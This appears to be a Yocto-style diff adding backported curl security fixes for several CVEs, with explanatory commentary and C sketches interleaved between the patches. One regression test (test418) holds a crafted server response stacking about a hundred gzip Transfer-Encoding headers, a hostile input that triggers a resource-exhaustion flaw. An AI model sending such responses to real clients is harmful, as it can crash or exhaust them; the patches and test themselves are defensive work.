+@@ -83,7 +84,7 @@ static int parsenetrc(const char *host,
+ char netrcbuffer[4096];
+ int netrcbuffsize = (int)sizeof(netrcbuffer);
+
+- while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {
++ while(!done && Curl_get_line(netrcbuffer, netrcbuffsize, file)) {
+ tok = strtok_r(netrcbuffer, " \t\n", &tok_buf);
+ if(tok && *tok == '#')
+ /* treat an initial hash as a comment line */
+@@ -169,7 +170,7 @@ static int parsenetrc(const char *host,
+
+ tok = strtok_r(NULL, " \t\n", &tok_buf);
+ } /* while(tok) */
+- } /* while fgets() */
++ } /* while Curl_get_line() */
+
+ out:
+ if(!retcode) {
+--
+2.34.1
+
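Curl_get_line() above replaces fgets() so the .netrc parser only ever sees complete lines, and an overlong line cannot be split into two bogus token sequences. A sketch of such a wrapper under that assumption; it approximates the behaviour and is not curl's implementation:

#include <stdio.h>
#include <string.h>

/* Return the next line only if it is complete: it fits in 'len' bytes and
   ends with '\n', or it is the final line before EOF. A truncated line
   stops parsing instead of being handed back in two halves. */
static char *get_whole_line(char *buf, int len, FILE *input)
{
  if(fgets(buf, len, input)) {
    size_t n = strlen(buf);
    if(n && buf[n - 1] == '\n')
      return buf;                 /* complete line */
    if(feof(input))
      return buf;                 /* last line without trailing newline */
  }
  return NULL;                    /* truncated line or nothing left */
}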
diff --git a/meta/recipes-support/curl/curl/CVE-2022-43552.patch b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
new file mode 100644
index 0000000000..d729441454
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-43552.patch
@@ -0,0 +1,82 @@
+From 4f20188ac644afe174be6005ef4f6ffba232b8b2 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 19 Dec 2022 08:38:37 +0100
+Subject: [PATCH] smb/telnet: do not free the protocol struct in *_done()
+
+It is managed by the generic layer.
+
+Reported-by: Trail of Bits
+
+Closes #10112
+
+CVE: CVE-2022-43552
+Upstream-Status: Backport [https://github.com/curl/curl/commit/4f20188ac644afe174be6005ef4f6ffba232b8b2]
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/smb.c | 14 ++------------
+ lib/telnet.c | 3 ---
+ 2 files changed, 2 insertions(+), 15 deletions(-)
+
+diff --git a/lib/smb.c b/lib/smb.c
+index 12f9925..8db3b27 100644
+--- a/lib/smb.c
++++ b/lib/smb.c
+@@ -61,8 +61,6 @@ static CURLcode smb_connect(struct connectdata *conn, bool *done);
+ static CURLcode smb_connection_state(struct connectdata *conn, bool *done);
+ static CURLcode smb_do(struct connectdata *conn, bool *done);
+ static CURLcode smb_request_state(struct connectdata *conn, bool *done);
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature);
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead);
+ static int smb_getsock(struct connectdata *conn, curl_socket_t *socks);
+ static CURLcode smb_parse_url_path(struct connectdata *conn);
+@@ -74,7 +72,7 @@ const struct Curl_handler Curl_handler_smb = {
+ "SMB", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -99,7 +97,7 @@ const struct Curl_handler Curl_handler_smbs = {
+ "SMBS", /* scheme */
+ smb_setup_connection, /* setup_connection */
+ smb_do, /* do_it */
+- smb_done, /* done */
++ ZERO_NULL, /* done */
+ ZERO_NULL, /* do_more */
+ smb_connect, /* connect_it */
+ smb_connection_state, /* connecting */
+@@ -919,14 +917,6 @@ static CURLcode smb_request_state(struct connectdata *conn, bool *done)
+ return CURLE_OK;
+ }
+
+-static CURLcode smb_done(struct connectdata *conn, CURLcode status,
+- bool premature)
+-{
+- (void) premature;
+- Curl_safefree(conn->data->req.protop);
+- return status;
+-}
+-
+ static CURLcode smb_disconnect(struct connectdata *conn, bool dead)
+ {
+ struct smb_conn *smbc = &conn->proto.smbc;
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 3347ad6..e3b9208 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -1294,9 +1294,6 @@ static CURLcode telnet_done(struct connectdata *conn,
+
+ curl_slist_free_all(tn->telnet_vars);
+ tn->telnet_vars = NULL;
+-
+- Curl_safefree(conn->data->req.protop);
+-
+ return CURLE_OK;
+ }
+
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-23916.patch b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
new file mode 100644
index 0000000000..054615963e
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-23916.patch
@@ -0,0 +1,231 @@
+From 119fb187192a9ea13dc90d9d20c215fc82799ab9 Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Mon, 13 Feb 2023 08:33:09 +0100
+Subject: [PATCH] content_encoding: do not reset stage counter for each header
+
+Test 418 verifies
+
+Closes #10492
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/119fb187192a9ea13dc90d9d20c215fc82799ab9]
+CVE: CVE-2023-23916
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/content_encoding.c | 7 +-
+ lib/urldata.h | 1 +
+ tests/data/Makefile.inc | 2 +-
+ tests/data/test418 | 152 ++++++++++++++++++++++++++++++++++++++++
+ 4 files changed, 157 insertions(+), 5 deletions(-)
+ create mode 100644 tests/data/test418
+
+diff --git a/lib/content_encoding.c b/lib/content_encoding.c
+index 91e621f..7e098a5 100644
+--- a/lib/content_encoding.c
++++ b/lib/content_encoding.c
+@@ -944,7 +944,6 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ {
+ struct Curl_easy *data = conn->data;
+ struct SingleRequest *k = &data->req;
+- int counter = 0;
+
+ do {
+ const char *name;
+@@ -979,9 +978,9 @@ CURLcode Curl_build_unencoding_stack(struct connectdata *conn,
+ if(!encoding)
+ encoding = &error_encoding; /* Defer error at stack use. */
+
+- if(++counter >= MAX_ENCODE_STACK) {
+- failf(data, "Reject response due to %u content encodings",
+- counter);
++ if(k->writer_stack_depth++ >= MAX_ENCODE_STACK) {
++ failf(data, "Reject response due to more than %u content encodings",
++ MAX_ENCODE_STACK);
+ return CURLE_BAD_CONTENT_ENCODING;
+ }
+ /* Stack the unencoding stage. */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ad0ef8f..168f874 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -648,6 +648,7 @@ struct SingleRequest {
+ #ifndef CURL_DISABLE_DOH
+ struct dohdata doh; /* DoH specific data for this request */
+ #endif
++ unsigned char writer_stack_depth; /* Unencoding stack depth. */
+ BIT(header); /* incoming data has HTTP header */
+ BIT(content_range); /* set TRUE if Content-Range: was found */
+ BIT(upload_done); /* set to TRUE when doing chunked transfer-encoding
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 60e8176..40de8bc 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -63,7 +63,7 @@ test350 test351 test352 test353 test354 test355 test356 test357 \
+ test393 test394 test395 \
+ \
+ test400 test401 test402 test403 test404 test405 test406 test407 test408 \
+-test409 \
++test409 test418 \
+ \
+ test490 test491 test492 \
+ \
+diff --git a/tests/data/test418 b/tests/data/test418
+new file mode 100644
+index 0000000..50e974e
+--- /dev/null
++++ b/tests/data/test418
+@@ -0,0 +1,152 @@
++<testcase>
++<info>
++<keywords>
++HTTP
++gzip
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<data nocheck="yes">
++HTTP/1.1 200 OK
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++Transfer-Encoding: gzip
++
++-foo-
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<server>
++http
++</server>
++ <name>
++Response with multiple Transfer-Encoding headers
++ </name>
++ <command>
++http://%HOSTIP:%HTTPPORT/%TESTNUMBER -sS
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++<protocol crlf="yes">
++GET /%TESTNUMBER HTTP/1.1
++Host: %HOSTIP:%HTTPPORT
++User-Agent: curl/%VERSION
++Accept: */*
++
++</protocol>
++
++# CURLE_BAD_CONTENT_ENCODING is 61
++<errorcode>
++61
++</errorcode>
++<stderr mode="text">
++curl: (61) Reject response due to more than 5 content encodings
++</stderr>
++</verify>
++</testcase>
+--
+2.25.1
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27533.patch b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
new file mode 100644
index 0000000000..64ba135056
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27533.patch
@@ -0,0 +1,59 @@
+Backport of:
+
+From 538b1e79a6e7b0bb829ab4cecc828d32105d0684 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 6 Mar 2023 12:07:33 +0100
+Subject: [PATCH] telnet: only accept option arguments in ascii
+
+To avoid embedded telnet negotiation commands etc.
+
+Reported-by: Harry Sintonen
+Closes #10728
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27533.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/538b1e79a6e7b0bb829ab4cecc828d32105d0684]
+CVE: CVE-2023-27533
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/telnet.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -815,6 +815,17 @@ static void printsub(struct Curl_easy *d
+ }
+ }
+
++static bool str_is_nonascii(const char *str)
++{
++ size_t len = strlen(str);
++ while(len--) {
++ if(*str & 0x80)
++ return TRUE;
++ str++;
++ }
++ return FALSE;
++}
++
+ static CURLcode check_telnet_options(struct connectdata *conn)
+ {
+ struct curl_slist *head;
+@@ -829,6 +840,8 @@ static CURLcode check_telnet_options(str
+ /* Add the user name as an environment variable if it
+ was given on the command line */
+ if(conn->bits.user_passwd) {
++ if(str_is_nonascii(data->conn->user))
++ return CURLE_BAD_FUNCTION_ARGUMENT;
+ msnprintf(option_arg, sizeof(option_arg), "USER,%s", conn->user);
+ beg = curl_slist_append(tn->telnet_vars, option_arg);
+ if(!beg) {
+@@ -844,6 +857,9 @@ static CURLcode check_telnet_options(str
+ if(sscanf(head->data, "%127[^= ]%*[ =]%255s",
+ option_keyword, option_arg) == 2) {
+
++ if(str_is_nonascii(option_arg))
++ continue;
++
+ /* Terminal type */
+ if(strcasecompare(option_keyword, "TTYPE")) {
+ strncpy(tn->subopt_ttype, option_arg, 31);
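The telnet fix above drops any option argument containing non-ASCII bytes, since bytes with the high bit set could smuggle embedded negotiation commands such as IAC. A tiny standalone sketch of that check; the function name is illustrative:

#include <stdbool.h>
#include <string.h>

/* Accept only pure 7-bit ASCII option values. */
static bool is_ascii_only(const char *str)
{
  size_t len = strlen(str);
  while(len--) {
    if(*str & 0x80)
      return false;
    str++;
  }
  return true;
}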
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
new file mode 100644
index 0000000000..46c57afb73
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534-pre1.patch
@@ -0,0 +1,51 @@
+From 6c51adeb71da076c5c40a45e339e06bb4394a86b Mon Sep 17 00:00:00 2001
+From: Eric Vigeant <evigeant@gmail.com>
+Date: Wed, 2 Nov 2022 11:47:09 -0400
+Subject: [PATCH] cur_path: do not add '/' if homedir ends with one
+
+When using SFTP and a path relative to the user home, do not add a
+trailing '/' to the user home dir if it already ends with one.
+
+Closes #9844
+
+CVE: CVE-2023-27534
+Note:
+- The upstream patch for CVE-2023-27534 does three things:
+1) creates the new path with dynbuf (a dynamic buffer)
+2) fixes the tilde handling error that causes CVE-2023-27534
+3) reworks the functionality added below (using dynbuf) so that no trailing "/" is appended to the user home dir when it already ends with one.
+- The dynbuf functionality only exists in later curl versions and is not essential to fix the vulnerability; it merely adds an extra feature there.
+- This patch implements the 3rd part of the upstream fix without using dynbuf.
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/6c51adeb71da076c5c40a45e339e06bb4394a86b]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 10 +++++++---
+ 1 file changed, 7 insertions(+), 3 deletions(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index f429634..40b92ee 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -70,10 +70,14 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ /* It is referenced to the home directory, so strip the
+ leading '/' */
+ memcpy(real_path, homedir, homelen);
+- real_path[homelen] = '/';
+- real_path[homelen + 1] = '\0';
++ /* Only add a trailing '/' if homedir does not end with one */
++ if(homelen == 0 || real_path[homelen - 1] != '/') {
++ real_path[homelen] = '/';
++ homelen++;
++ real_path[homelen] = '\0';
++ }
+ if(working_path_len > 3) {
+- memcpy(real_path + homelen + 1, working_path + 3,
++ memcpy(real_path + homelen, working_path + 3,
+ 1 + working_path_len -3);
+ }
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27534.patch b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
new file mode 100644
index 0000000000..3ecd181290
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27534.patch
@@ -0,0 +1,33 @@
+From 4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 16:22:11 +0100
+Subject: [PATCH] curl_path: create the new path with dynbuf
+
+Closes #10729
+
+CVE: CVE-2023-27534
+Note: This patch is needed to backport the fix for CVE-2023-27534
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ lib/curl_path.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/lib/curl_path.c b/lib/curl_path.c
+index 40b92ee..598c5dd 100644
+--- a/lib/curl_path.c
++++ b/lib/curl_path.c
+@@ -60,7 +60,7 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
+ memcpy(real_path, working_path, 1 + working_path_len);
+ }
+ else if(conn->handler->protocol & CURLPROTO_SFTP) {
+- if((working_path_len > 1) && (working_path[1] == '~')) {
++ if((working_path_len > 2) && !memcmp(working_path, "/~/", 3)) {
+ size_t homelen = strlen(homedir);
+ real_path = malloc(homelen + working_path_len + 1);
+ if(real_path == NULL) {
+--
+2.24.4
+
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
new file mode 100644
index 0000000000..034b72f7e6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
@@ -0,0 +1,236 @@
+From ed5095ed94281989e103c72e032200b83be37878 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 6 Oct 2022 00:49:10 +0200
+Subject: [PATCH] strcase: add and use Curl_timestrcmp
+
+This is a strcmp() alternative function for comparing "secrets",
+designed to take the same time no matter the content to not leak
+match/non-match info to observers based on how fast it is.
+
+The time this function takes is only a function of the shortest input
+string.
+
+Reported-by: Trail of Bits
+
+Closes #9658
+
+Upstream-Status: Backport from [https://github.com/curl/curl/commit/ed5095ed94281989e103c72e032200b83be37878 & https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
+Comment: to backport fix for CVE-2023-27535, add function Curl_timestrcmp.
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/netrc.c | 6 +++---
+ lib/strcase.c | 22 ++++++++++++++++++++++
+ lib/strcase.h | 1 +
+ lib/url.c | 33 +++++++++++++--------------------
+ lib/vauth/digest_sspi.c | 4 ++--
+ lib/vtls/vtls.c | 21 ++++++++++++++++++++-
+ 6 files changed, 61 insertions(+), 26 deletions(-)
+
+diff --git a/lib/netrc.c b/lib/netrc.c
+index 9323913..fe3fd1e 100644
+--- a/lib/netrc.c
++++ b/lib/netrc.c
+@@ -124,9 +124,9 @@ static int parsenetrc(const char *host,
+ /* we are now parsing sub-keywords concerning "our" host */
+ if(state_login) {
+ if(specific_login) {
+- state_our_login = strcasecompare(login, tok);
++ state_our_login = !Curl_timestrcmp(login, tok);
+ }
+- else if(!login || strcmp(login, tok)) {
++ else if(!login || Curl_timestrcmp(login, tok)) {
+ if(login_alloc) {
+ free(login);
+ login_alloc = FALSE;
+@@ -142,7 +142,7 @@ static int parsenetrc(const char *host,
+ }
+ else if(state_password) {
+ if((state_our_login || !specific_login)
+- && (!password || strcmp(password, tok))) {
++ && (!password || Curl_timestrcmp(password, tok))) {
+ if(password_alloc) {
+ free(password);
+ password_alloc = FALSE;
+diff --git a/lib/strcase.c b/lib/strcase.c
+index 70bf21c..ec776b3 100644
+--- a/lib/strcase.c
++++ b/lib/strcase.c
+@@ -261,6 +261,28 @@ bool Curl_safecmp(char *a, char *b)
+ return !a && !b;
+ }
+
++/*
++ * Curl_timestrcmp() returns 0 if the two strings are identical. The time this
++ * function spends is a function of the shortest string, not of the contents.
++ */
++int Curl_timestrcmp(const char *a, const char *b)
++{
++ int match = 0;
++ int i = 0;
++
++ if(a && b) {
++ while(1) {
++ match |= a[i]^b[i];
++ if(!a[i] || !b[i])
++ break;
++ i++;
++ }
++ }
++ else
++ return a || b;
++ return match;
++}
++
+ /* --- public functions --- */
+
+ int curl_strequal(const char *first, const char *second)
+diff --git a/lib/strcase.h b/lib/strcase.h
+index 8929a53..8077108 100644
+--- a/lib/strcase.h
++++ b/lib/strcase.h
+@@ -49,5 +49,6 @@ void Curl_strntoupper(char *dest, const char *src, size_t n);
+ void Curl_strntolower(char *dest, const char *src, size_t n);
+
+ bool Curl_safecmp(char *a, char *b);
++int Curl_timestrcmp(const char *first, const char *second);
+
+ #endif /* HEADER_CURL_STRCASE_H */
+diff --git a/lib/url.c b/lib/url.c
+index 9f14a7b..dfbde3b 100644
+--- a/lib/url.c
++++ b/lib/url.c
+@@ -886,19 +886,10 @@ socks_proxy_info_matches(const struct proxy_info* data,
+ /* the user information is case-sensitive
+ or at least it is not defined as case-insensitive
+ see https://tools.ietf.org/html/rfc3986#section-3.2.1 */
+- if((data->user == NULL) != (needle->user == NULL))
+- return FALSE;
+- /* curl_strequal does a case insentive comparison, so do not use it here! */
+- if(data->user &&
+- needle->user &&
+- strcmp(data->user, needle->user) != 0)
+- return FALSE;
+- if((data->passwd == NULL) != (needle->passwd == NULL))
+- return FALSE;
++
+ /* curl_strequal does a case insentive comparison, so do not use it here! */
+- if(data->passwd &&
+- needle->passwd &&
+- strcmp(data->passwd, needle->passwd) != 0)
++ if(Curl_timestrcmp(data->user, needle->user) ||
++ Curl_timestrcmp(data->passwd, needle->passwd))
+ return FALSE;
+ return TRUE;
+ }
+@@ -1257,10 +1248,10 @@ ConnectionExists(struct Curl_easy *data,
+ if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST)) {
+ /* This protocol requires credentials per connection,
+ so verify that we're using the same name and password as well */
+- if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd) ||
+- !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
+- !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
++ if(Curl_timestrcmp(needle->user, check->user) ||
++ Curl_timestrcmp(needle->passwd, check->passwd) ||
++ Curl_timestrcmp(needle->sasl_authzid, check->sasl_authzid) ||
++ Curl_timestrcmp(needle->oauth_bearer, check->oauth_bearer)) {
+ /* one of them was different */
+ continue;
+ }
+@@ -1326,8 +1317,8 @@ ConnectionExists(struct Curl_easy *data,
+ possible. (Especially we must not reuse the same connection if
+ partway through a handshake!) */
+ if(wantNTLMhttp) {
+- if(strcmp(needle->user, check->user) ||
+- strcmp(needle->passwd, check->passwd)) {
++ if(Curl_timestrcmp(needle->user, check->user) ||
++ Curl_timestrcmp(needle->passwd, check->passwd)) {
+
+ /* we prefer a credential match, but this is at least a connection
+ that can be reused and "upgraded" to NTLM */
+@@ -1348,8 +1339,10 @@ ConnectionExists(struct Curl_easy *data,
+ if(!check->http_proxy.user || !check->http_proxy.passwd)
+ continue;
+
+- if(strcmp(needle->http_proxy.user, check->http_proxy.user) ||
+- strcmp(needle->http_proxy.passwd, check->http_proxy.passwd))
++ if(Curl_timestrcmp(needle->http_proxy.user,
++ check->http_proxy.user) ||
++ Curl_timestrcmp(needle->http_proxy.passwd,
++ check->http_proxy.passwd))
+ continue;
+ }
+ else if(check->proxy_ntlm_state != NTLMSTATE_NONE) {
+diff --git a/lib/vauth/digest_sspi.c b/lib/vauth/digest_sspi.c
+index a109056..3986386 100644
+--- a/lib/vauth/digest_sspi.c
++++ b/lib/vauth/digest_sspi.c
+@@ -450,8 +450,8 @@ CURLcode Curl_auth_create_digest_http_message(struct Curl_easy *data,
+ has changed then delete that context. */
+ if((userp && !digest->user) || (!userp && digest->user) ||
+ (passwdp && !digest->passwd) || (!passwdp && digest->passwd) ||
+- (userp && digest->user && strcmp(userp, digest->user)) ||
+- (passwdp && digest->passwd && strcmp(passwdp, digest->passwd))) {
++ (userp && digest->user && Curl_timestrcmp(userp, digest->user)) ||
++ (passwdp && digest->passwd && Curl_timestrcmp(passwdp, digest->passwd))) {
+ if(digest->http_context) {
+ s_pSecFn->DeleteSecurityContext(digest->http_context);
+ Curl_safefree(digest->http_context);
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index e8cb70f..70a9391 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -98,9 +98,15 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+ Curl_safecmp(data->issuercert, needle->issuercert) &&
+ Curl_safecmp(data->clientcert, needle->clientcert) &&
+ Curl_safecmp(data->random_file, needle->random_file) &&
+- Curl_safecmp(data->egdsocket, needle->egdsocket) &&
++ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
++#ifdef USE_TLS_SRP
++ !Curl_timestrcmp(data->username, needle->username) &&
++ !Curl_timestrcmp(data->password, needle->password) &&
++ (data->authtype == needle->authtype) &&
++#endif
+ Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+ Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
++ Curl_safe_strcasecompare(data->CRLfile, needle->CRLfile) &&
+ Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+ return TRUE;
+
+@@ -117,6 +123,9 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+ dest->verifyhost = source->verifyhost;
+ dest->verifystatus = source->verifystatus;
+ dest->sessionid = source->sessionid;
++#ifdef USE_TLS_SRP
++ dest->authtype = source->authtype;
++#endif
+
+ CLONE_STRING(CApath);
+ CLONE_STRING(CAfile);
+@@ -127,6 +136,11 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+ CLONE_STRING(cipher_list);
+ CLONE_STRING(cipher_list13);
+ CLONE_STRING(pinned_key);
++ CLONE_STRING(CRLfile);
++#ifdef USE_TLS_SRP
++ CLONE_STRING(username);
++ CLONE_STRING(password);
++#endif
+
+ return TRUE;
+ }
+@@ -142,6 +156,11 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ Curl_safefree(sslc->cipher_list);
+ Curl_safefree(sslc->cipher_list13);
+ Curl_safefree(sslc->pinned_key);
++ Curl_safefree(sslc->CRLfile);
++#ifdef USE_TLS_SRP
++ Curl_safefree(sslc->username);
++ Curl_safefree(sslc->password);
++#endif
+ }
+
+ #ifdef USE_SSL
+--
+2.25.1
+
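Curl_timestrcmp() above compares credentials in time that depends only on the shorter input, so connection matching cannot leak how long a common prefix is. A standalone sketch of the same accumulate-the-XOR pattern with a small usage example; the wrapper name is illustrative:

#include <stdio.h>

/* Accumulate differences instead of returning at the first mismatch, so
   runtime does not reveal where the strings diverge. Returns 0 when equal. */
static int secret_strcmp(const char *a, const char *b)
{
  int match = 0;
  size_t i = 0;

  if(!a || !b)
    return a != b;            /* one NULL: differ; both NULL: equal */

  for(;;) {
    match |= a[i] ^ b[i];
    if(!a[i] || !b[i])
      break;
    i++;
  }
  return match;
}

int main(void)
{
  printf("%d %d\n", secret_strcmp("hunter2", "hunter2"),
         secret_strcmp("hunter2", "hunter3") != 0);   /* prints: 0 1 */
  return 0;
}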
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535.patch b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
new file mode 100644
index 0000000000..e38390a57c
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
@@ -0,0 +1,170 @@
+From 8f4608468b890dce2dad9f91d5607ee7e9c1aba1 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Thu, 9 Mar 2023 17:47:06 +0100
+Subject: [PATCH] ftp: add more conditions for connection reuse
+
+Reported-by: Harry Sintonen
+Closes #10730
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27535.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/curl/curl/commit/8f4608468b890dce2dad9f91d5607ee7e9c1aba1]
+CVE: CVE-2023-27535
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/ftp.c | 30 ++++++++++++++++++++++++++++--
+ lib/ftp.h | 5 +++++
+ lib/setopt.c | 2 +-
+ lib/url.c | 16 +++++++++++++++-
+ lib/urldata.h | 4 ++--
+ 5 files changed, 51 insertions(+), 6 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 31a34e8..7a82a74 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -4059,6 +4059,10 @@ static CURLcode ftp_disconnect(struct connectdata *conn, bool dead_connection)
+ }
+
+ freedirs(ftpc);
++ free(ftpc->account);
++ ftpc->account = NULL;
++ free(ftpc->alternative_to_user);
++ ftpc->alternative_to_user = NULL;
+ free(ftpc->prevpath);
+ ftpc->prevpath = NULL;
+ free(ftpc->server_os);
+@@ -4326,11 +4330,31 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
+ struct Curl_easy *data = conn->data;
+ char *type;
+ struct FTP *ftp;
